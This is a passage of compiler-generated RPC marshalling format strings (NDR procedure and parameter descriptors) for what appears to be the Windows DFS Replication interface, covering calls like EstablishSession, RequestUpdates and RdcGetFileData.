NdrFcShort( 0x1 ), /* 1 */ /* 56 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ /* 58 */ 0x32, /* FC_BIND_PRIMITIVE */ 0x0, /* 0 */ /* 60 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 62 */ NdrFcShort( 0x98 ), /* 152 */ /* 64 */ NdrFcShort( 0x40 ), /* 64 */ /* 66 */ 0x44, /* Oi2 Flags: has return, has ext, */ 0x7, /* 7 */ /* 68 */ 0xa, /* 10 */ 0x81, /* Ext Flags: new corr desc, has big amd64 byval param */ /* 70 */ NdrFcShort( 0x0 ), /* 0 */ /* 72 */ NdrFcShort( 0x0 ), /* 0 */ /* 74 */ NdrFcShort( 0x0 ), /* 0 */ /* 76 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter IDL_handle */ /* 78 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 80 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 82 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter replicaSetId */ /* 84 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 86 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 88 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter connectionId */ /* 90 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 92 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 94 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter downstreamProtocolVersion */ /* 96 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 98 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 100 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter downstreamFlags */ /* 102 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 104 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ /* 106 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter upstreamProtocolVersion */ /* 108 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 110 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ /* 112 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter upstreamFlags */ /* 114 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 116 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ /* 118 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure EstablishSession */ /* Return value */ /* 120 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 122 */ NdrFcLong( 0x0 ), /* 0 */ /* 126 */ NdrFcShort( 0x2 ), /* 2 */ /* 128 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 130 */ 0x32, /* FC_BIND_PRIMITIVE */ 0x0, /* 0 */ /* 132 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 134 */ NdrFcShort( 0x88 ), /* 136 */ /* 136 */ NdrFcShort( 0x8 ), /* 8 */ /* 138 */ 0x44, /* Oi2 Flags: has return, has ext, */ 0x3, /* 3 */ /* 140 */ 0xa, /* 10 */ 0x81, /* Ext Flags: new corr desc, has big amd64 byval param */ /* 142 */ NdrFcShort( 0x0 ), /* 0 */ /* 144 */ NdrFcShort( 0x0 ), /* 0 */ /* 146 */ NdrFcShort( 0x0 ), /* 0 */ /* 148 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter IDL_handle */ /* 150 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 152 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 154 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter connectionId */ /* 156 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 158 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 160 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter contentSetId */ /* 162 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 164 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 166 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure RequestUpdates */ /* Return value */ /* 168 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 170 */ NdrFcLong( 0x0 ), /* 0 */ /* 174 */ NdrFcShort( 0x3 ), /* 3 */ /* 176 */ NdrFcShort( 0x78 ), /* X64 Stack size/offset = 120 */ /* 178 */ 0x32, /* FC_BIND_PRIMITIVE */ 0x0, /* 0 */ /* 180 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 182 */ NdrFcShort( 0xa6 ), /* 166 */ /* 184 */ NdrFcShort( 0xa6 ), /* 166 */ /* 186 */ 0xc7, /* Oi2 Flags: srv must size, clt must size, has return, has ext, has async handle */ 0xd, /* 13 */ /* 188 */ 0xa, /* 10 */ 0x87, /* Ext Flags: new corr desc, clt corr check, srv corr check, has big amd64 byval param */ /* 190 */ NdrFcShort( 0x1 ), /* 1 */ /* 192 */ NdrFcShort( 0x1 ), /* 1 */ /* 194 */ NdrFcShort( 0x0 ), /* 0 */ /* 196 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter IDL_handle */ /* 198 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 200 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 202 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter connectionId */ /* 204 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 206 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 208 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter contentSetId */ /* 210 */ NdrFcShort( 0x88 ), /* Flags: in, by val, */ /* 212 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 214 */ NdrFcShort( 0x1c ), /* 28 */ /* Parameter creditsAvailable */ /* 216 */ NdrFcShort( 0x88 ), /* Flags: in, by val, */ /* 218 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ /* 220 */ NdrFcShort( 0x26 ), /* 38 */ /* Parameter hashRequested */ /* 222 */ NdrFcShort( 0x88 ), /* Flags: in, by val, */ /* 224 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ /* 226 */ NdrFcShort( 0x30 ), /* 48 */ /* Parameter updateRequestType */ /* 228 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 230 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ /* 232 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter versionVectorDiffCount */ /* 234 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ /* 236 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ /* 238 */ NdrFcShort( 0x4a ), /* Type Offset=74 */ /* Parameter versionVectorDiff */ /* 240 */ NdrFcShort( 0x113 ), /* Flags: must size, must free, out, simple ref, */ /* 242 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ /* 244 */ NdrFcShort( 0xb6 ), /* Type Offset=182 */ /* Parameter frsUpdate */ /* 246 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 248 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ /* 250 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter updateCount */ /* 252 */ NdrFcShort( 0x2010 ), /* Flags: out, srv alloc size=8 */ /* 254 */ NdrFcShort( 0x58 ), /* X64 Stack size/offset = 88 */ /* 256 */ NdrFcShort( 0xcc ), /* Type Offset=204 */ /* Parameter updateStatus */ /* 258 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */ /* 260 */ NdrFcShort( 0x60 ), /* X64 Stack size/offset = 96 */ /* 262 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter gvsnDbGuid */ /* 264 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 266 */ NdrFcShort( 0x68 ), /* X64 Stack size/offset = 104 */ /* 268 */ 0xb, /* FC_HYPER */ 0x0, /* 0 */ /* Parameter gvsnVersion */ /* 270 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 272 */ NdrFcShort( 0x70 ), /* X64 Stack size/offset = 112 */ /* 274 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure RequestVersionVector */ /* Return value */ /* 276 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 278 */ NdrFcLong( 0x0 ), /* 0 */ /* 282 */ NdrFcShort( 0x4 ), /* 4 */ /* 284 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ /* 286 */ 0x32, /* FC_BIND_PRIMITIVE */ 0x0, /* 0 */ /* 288 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 290 */ NdrFcShort( 0xac ), /* 172 */ /* 292 */ NdrFcShort( 0x8 ), /* 8 */ /* 294 */ 0xc4, /* Oi2 Flags: has return, has ext, has async handle */ 0x7, /* 7 */ /* 296 */ 0xa, /* 10 */ 0x81, /* Ext Flags: new corr desc, has big amd64 byval param */ /* 298 */ NdrFcShort( 0x0 ), /* 0 */ /* 300 */ NdrFcShort( 0x0 ), /* 0 */ /* 302 */ NdrFcShort( 0x0 ), /* 0 */ /* 304 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter IDL_handle */ /* 306 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 308 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 310 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter sequenceNumber */ /* 312 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 314 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 316 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter connectionId */ /* 318 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 320 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 322 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter contentSetId */ /* 324 */ NdrFcShort( 0x88 ), /* Flags: in, by val, */ /* 326 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ /* 328 */ NdrFcShort( 0xd8 ), /* 216 */ /* Parameter requestType */ /* 330 */ NdrFcShort( 0x88 ), /* Flags: in, by val, */ /* 332 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ /* 334 */ NdrFcShort( 0xe2 ), /* 226 */ /* Parameter changeType */ /* 336 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 338 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ /* 340 */ 0xb, /* FC_HYPER */ 0x0, /* 0 */ /* Parameter vvGeneration */ /* 342 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 344 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ /* 346 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure AsyncPoll */ /* Return value */ /* 348 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 350 */ NdrFcLong( 0x0 ), /* 0 */ /* 354 */ NdrFcShort( 0x5 ), /* 5 */ /* 356 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ /* 358 */ 0x32, /* FC_BIND_PRIMITIVE */ 0x0, /* 0 */ /* 360 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 362 */ NdrFcShort( 0x44 ), /* 68 */ /* 364 */ NdrFcShort( 0x8 ), /* 8 */ /* 366 */ 0xc5, /* Oi2 Flags: srv must size, has return, has ext, has async handle */ 0x3, /* 3 */ /* 368 */ 0xa, /* 10 */ 0x83, /* Ext Flags: new corr desc, clt corr check, has big amd64 byval param */ /* 370 */ NdrFcShort( 0x1 ), /* 1 */ /* 372 */ NdrFcShort( 0x0 ), /* 0 */ /* 374 */ NdrFcShort( 0x0 ), /* 0 */ /* 376 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter IDL_handle */ /* 378 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 380 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 382 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter connectionId */ /* 384 */ NdrFcShort( 0xc113 ), /* Flags: must size, must free, out, simple ref, srv alloc size=48 */ /* 386 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 388 */ NdrFcShort( 0x150 ), /* Type Offset=336 */ /* Parameter response */ /* 390 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 392 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 394 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure RequestRecords */ /* Return value */ /* 396 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 398 */ NdrFcLong( 0x0 ), /* 0 */ /* 402 */ NdrFcShort( 0x6 ), /* 6 */ /* 404 */ NdrFcShort( 0x60 ), /* X64 Stack size/offset = 96 */ /* 406 */ 0x32, /* FC_BIND_PRIMITIVE */ 0x0, /* 0 */ /* 408 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 410 */ NdrFcShort( 0xf8 ), /* 248 */ /* 412 */ NdrFcShort( 0x76 ), /* 118 */ /* 414 */ 0xc5, /* Oi2 Flags: srv must size, has return, has ext, has async handle */ 0xa, /* 10 */ /* 416 */ 0xa, /* 10 */ 0x83, /* Ext Flags: new corr desc, clt corr check, has big amd64 byval param */ /* 418 */ NdrFcShort( 0x1 ), /* 1 */ /* 420 */ NdrFcShort( 0x0 ), /* 0 */ /* 422 */ NdrFcShort( 0x0 ), /* 0 */ /* 424 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter IDL_handle */ /* 426 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 428 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 430 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter connectionId */ /* 432 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 434 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 436 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter contentSetId */ /* 438 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 440 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 442 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter uidDbGuid */ /* 444 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 446 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ /* 448 */ 0xb, /* FC_HYPER */ 0x0, /* 0 */ /* Parameter uidVersion */ /* 450 */ NdrFcShort( 0x158 ), /* Flags: in, out, base type, simple ref, */ /* 452 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ /* 454 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter maxRecords */ /* 456 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 458 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ /* 460 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter numRecords */ /* 462 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 464 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ /* 466 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter numBytes */ /* 468 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ /* 470 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ /* 472 */ NdrFcShort( 0x164 ), /* Type Offset=356 */ /* Parameter compressedRecords */ /* 474 */ NdrFcShort( 0x2010 ), /* Flags: out, srv alloc size=8 */ /* 476 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ /* 478 */ NdrFcShort( 0xcc ), /* Type Offset=204 */ /* Parameter recordsStatus */ /* 480 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 482 */ NdrFcShort( 0x58 ), /* X64 Stack size/offset = 88 */ /* 484 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure UpdateCancel */ /* Return value */ /* 486 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 488 */ NdrFcLong( 0x0 ), /* 0 */ /* 492 */ NdrFcShort( 0x7 ), /* 7 */ /* 494 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 496 */ 0x32, /* FC_BIND_PRIMITIVE */ 0x0, /* 0 */ /* 498 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 500 */ NdrFcShort( 0x44 ), /* 68 */ /* 502 */ NdrFcShort( 0x8 ), /* 8 */ /* 504 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ 0x3, /* 3 */ /* 506 */ 0xa, /* 10 */ 0x81, /* Ext Flags: new corr desc, has big amd64 byval param */ /* 508 */ NdrFcShort( 0x0 ), /* 0 */ /* 510 */ NdrFcShort( 0x0 ), /* 0 */ /* 512 */ NdrFcShort( 0x0 ), /* 0 */ /* 514 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter IDL_handle */ /* 516 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 518 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 520 */ NdrFcShort( 0xc ), /* Type Offset=12 */ /* Parameter connectionId */ /* 522 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ /* 524 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 526 */ NdrFcShort( 0x17c ), /* Type Offset=380 */ /* Parameter cancelData */ /* 528 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 530 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 532 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure RawGetFileData */ /* Return value */ /* 534 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 536 */ NdrFcLong( 0x0 ), /* 0 */ /* 540 */ NdrFcShort( 0x8 ), /* 8 */ /* 542 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ /* 544 */ 0x30, /* FC_BIND_CONTEXT */ 0xe8, /* Ctxt flags: via ptr, in, out, strict, */ /* 546 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 548 */ 0x0, /* 0 */ 0x0, /* 0 */ /* 550 */ NdrFcShort( 0x40 ), /* 64 */ /* 552 */ NdrFcShort( 0x78 ), /* 120 */ /* 554 */ 0x45, /* Oi2 Flags: srv must size, has return, has ext, */ 0x6, /* 6 */ /* 556 */ 0xa, /* 10 */ 0x3, /* Ext Flags: new corr desc, clt corr check, */ /* 558 */ NdrFcShort( 0x1 ), /* 1 */ /* 560 */ NdrFcShort( 0x0 ), /* 0 */ /* 562 */ NdrFcShort( 0x0 ), /* 0 */ /* 564 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter serverContext */ /* 566 */ NdrFcShort( 0x118 ), /* Flags: in, out, simple ref, */ /* 568 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 570 */ NdrFcShort( 0x1a4 ), /* Type Offset=420 */ /* Parameter dataBuffer */ /* 572 */ NdrFcShort( 0x113 ), /* Flags: must size, must free, out, simple ref, */ /* 574 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 576 */ NdrFcShort( 0x1ac ), /* Type Offset=428 */ /* Parameter bufferSize */ /* 578 */ NdrFcShort( 0x88 ), /* Flags: in, by val, */ /* 580 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 582 */ NdrFcShort( 0x1be ), /* 446 */ /* Parameter sizeRead */ /* 584 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 586 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 588 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter isEndOfFile */ /* 590 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 592 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 594 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Return value */ /* 596 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 598 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ /* 600 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure RdcGetSignatures */ /* 602 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 604 */ NdrFcLong( 0x0 ), /* 0 */ /* 608 */ NdrFcShort( 0x9 ), /* 9 */ /* 610 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ /* 612 */ 0x30, /* FC_BIND_CONTEXT */ 0x48, /* Ctxt flags: in, strict, */ /* 614 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 616 */ 0x0, /* 0 */ 0x0, /* 0 */ /* 618 */ NdrFcShort( 0x41 ), /* 65 */ /* 620 */ NdrFcShort( 0x24 ), /* 36 */ /* 622 */ 0x45, /* Oi2 Flags: srv must size, has return, has ext, */ 0x7, /* 7 */ /* 624 */ 0xa, /* 10 */ 0x3, /* Ext Flags: new corr desc, clt corr check, */ /* 626 */ NdrFcShort( 0x1 ), /* 1 */ /* 628 */ NdrFcShort( 0x0 ), /* 0 */ /* 630 */ NdrFcShort( 0x0 ), /* 0 */ /* 632 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter serverContext */ /* 634 */ NdrFcShort( 0x8 ), /* Flags: in, */ /* 636 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 638 */ NdrFcShort( 0x1c8 ), /* Type Offset=456 */ /* Parameter level */ /* 640 */ NdrFcShort( 0x88 ), /* Flags: in, by val, */ /* 642 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 644 */ NdrFcShort( 0x1cc ), /* 460 */ /* Parameter offset */ /* 646 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 648 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 650 */ 0xb, /* FC_HYPER */ 0x0, /* 0 */ /* Parameter buffer */ /* 652 */ NdrFcShort( 0x113 ), /* Flags: must size, must free, out, simple ref, */ /* 654 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 656 */ NdrFcShort( 0x1da ), /* Type Offset=474 */ /* Parameter length */ /* 658 */ NdrFcShort( 0x88 ), /* Flags: in, by val, */ /* 660 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 662 */ NdrFcShort( 0x1ec ), /* 492 */ /* Parameter sizeRead */ /* 664 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 666 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ /* 668 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Return value */ /* 670 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 672 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ /* 674 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure RdcPushSourceNeeds */ /* 676 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 678 */ NdrFcLong( 0x0 ), /* 0 */ /* 682 */ NdrFcShort( 0xa ), /* 10 */ /* 684 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 686 */ 0x30, /* FC_BIND_CONTEXT */ 0x48, /* Ctxt flags: in, strict, */ /* 688 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 690 */ 0x0, /* 0 */ 0x0, /* 0 */ /* 692 */ NdrFcShort( 0x2c ), /* 44 */ /* 694 */ NdrFcShort( 0x8 ), /* 8 */ /* 696 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ 0x4, /* 4 */ /* 698 */ 0xa, /* 10 */ 0x5, /* Ext Flags: new corr desc, srv corr check, */ /* 700 */ NdrFcShort( 0x0 ), /* 0 */ /* 702 */ NdrFcShort( 0x1 ), /* 1 */ /* 704 */ NdrFcShort( 0x0 ), /* 0 */ /* 706 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter serverContext */ /* 708 */ NdrFcShort( 0x8 ), /* Flags: in, */ /* 710 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 712 */ NdrFcShort( 0x1c8 ), /* Type Offset=456 */ /* Parameter sourceNeeds */ /* 714 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ /* 716 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 718 */ NdrFcShort( 0x202 ), /* Type Offset=514 */ /* Parameter needCount */ /* 720 */ NdrFcShort( 0x88 ), /* Flags: in, by val, */ /* 722 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 724 */ NdrFcShort( 0x218 ), /* 536 */ /* Return value */ /* 726 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 728 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 730 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure RdcGetFileData */ /* 732 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 734 */ NdrFcLong( 0x0 ), /* 0 */ /* 738 */ NdrFcShort( 0xb ), /* 11 */ /* 740 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ /* 742 */ 0x30, /* FC_BIND_CONTEXT */ 0x48, /* Ctxt flags: in, strict, */ /* 744 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 746 */ 0x0, /* 0 */ 0x0, /* 0 */ /* 748 */ NdrFcShort( 0x2c ), /* 44 */ /* 750 */ NdrFcShort( 0x24 ), /* 36 */ /* 752 */ 0x45, /* Oi2 Flags: srv must size, has return, has ext, */ 0x5, /* 5 */ /* 754 */ 0xa, /* 10 */ 0x3, /* Ext Flags: new corr desc, clt corr check, */ /* 756 */ NdrFcShort( 0x1 ), /* 1 */ /* 758 */ NdrFcShort( 0x0 ), /* 0 */ /* 760 */ NdrFcShort( 0x0 ), /* 0 */ /* 762 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter serverContext */ /* 764 */ NdrFcShort( 0x8 ), /* Flags: in, */ /* 766 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 768 */ NdrFcShort( 0x1c8 ), /* Type Offset=456 */ /* Parameter dataBuffer */ /* 770 */ NdrFcShort( 0x113 ), /* Flags: must size, must free, out, simple ref, */ /* 772 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 774 */ NdrFcShort( 0x1ac ), /* Type Offset=428 */ /* Parameter bufferSize */ /* 776 */ NdrFcShort( 0x88 ), /* Flags: in, by val, */ /* 778 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 780 */ NdrFcShort( 0x222 ), /* 546 */ /* Parameter sizeReturned */ /* 782 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 784 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 786 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Return value */ /* 788 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 790 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 792 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Procedure RdcClose */ /* 794 */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 796 */ NdrFcLong( 0x0 ), /* 0 */ /* 800 */ NdrFcShort( 0xc ), /* 12 */ /* 802 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 804 */ 0x30, /* FC_BIND_CONTEXT */ 0xe8, /* Ctxt flags: via ptr, in, out, strict, */ /* 806 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 808 */ 0x0, /* 0 */ 0x0, /* 0 */ /* 810 */ NdrFcShort( 0x38 ), /* 56 */ /* 812 */ NdrFcShort( 0x40 ), /* 64 */ /* 814 */ 0x44, /* Oi2 Flags: has return, has ext, */ 0x2, /* 2 */ /* 816 */ 0xa, /* 10 */ 0x1, /* Ext Flags: new corr desc, */ /* 818 */ NdrFcShort( 0x0 ), /* 0 */ /* 820 */ NdrFcShort( 0x0 ), /* 0 */ /* 822 */ NdrFcShort( 0x0 ), /* 0 */ /* 824 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter serverContext */ /* 826 */ NdrFcShort( 0x118 ), /* Flags: in, out, simple ref, */ /* 828 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 830 */ NdrFcShort( 0x1a4 ), /* Type Offset=420 */ /* Return value */ /* 832 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 834 